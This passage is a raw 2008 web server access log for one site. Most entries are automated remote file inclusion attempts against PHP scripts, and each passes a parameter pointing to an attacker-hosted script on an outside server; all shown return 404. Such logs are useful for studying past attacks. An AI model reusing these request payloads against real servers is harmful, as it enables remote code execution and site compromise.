72.232.196.106 - - [04/Aug/2008:04:28:51 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
82.56.251.20 - - [04/Aug/2008:04:33:51 -0700] "GET /logs/access_080630.log HTTP/1.1" 200 589824 "http://www.google.it/search?hl=it&q=centrogassystem&btnG=Cerca&meta=" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; it-it) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1" "www.aliirwin.com"
201.130.79.130 - - [04/Aug/2008:04:34:07 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
70.84.182.98 - - [04/Aug/2008:04:34:43 -0700] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
201.130.79.130 - - [04/Aug/2008:04:35:18 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
70.84.182.98 - - [04/Aug/2008:04:35:58 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
87.230.35.101 - - [04/Aug/2008:04:36:00 -0700] "GET //addons/guildbank/searcharrays.php?addonDir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.aliirwin.com"
70.84.182.98 - - [04/Aug/2008:04:36:00 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
87.230.35.101 - - [04/Aug/2008:04:36:01 -0700] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.aliirwin.com"
201.130.79.130 - - [04/Aug/2008:04:36:01 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
62.231.161.4 - - [04/Aug/2008:04:36:53 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:37:01 -0700] "GET /logs/access_080616.log/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:37:01 -0700] "GET /rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:37:04 -0700] "GET /logs/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:37:18 -0700] "GET /logs/access_080609.log/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
62.141.56.49 - - [04/Aug/2008:04:40:45 -0700] "GET //index.php?page=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.aliirwin.com"
62.141.56.49 - - [04/Aug/2008:04:40:45 -0700] "GET /logs//index.php?page=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:40:48 -0700] "GET /logs/access_080616.log/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:40:49 -0700] "GET /rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:40:49 -0700] "GET /logs/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:40:54 -0700] "GET /logs/access_080609.log/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:41:14 -0700] "GET /rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:41:14 -0700] "GET /logs/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:41:15 -0700] "GET /logs/access_080616.log/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:41:19 -0700] "GET /logs/access_080609.log/rfihttp://dj.caucasus.net/colins.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
98.129.33.59 - - [04/Aug/2008:04:41:44 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.aliirwin.com"
98.129.33.59 - - [04/Aug/2008:04:41:44 -0700] "GET //includes/mailaccess/pop3.php=http://alohaclubhawaii.com/members/community/plugins/safehtml/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.aliirwin.com"
74.53.152.210 - - [04/Aug/2008:04:50:34 -0700] "GET /logs/access_080519.log//as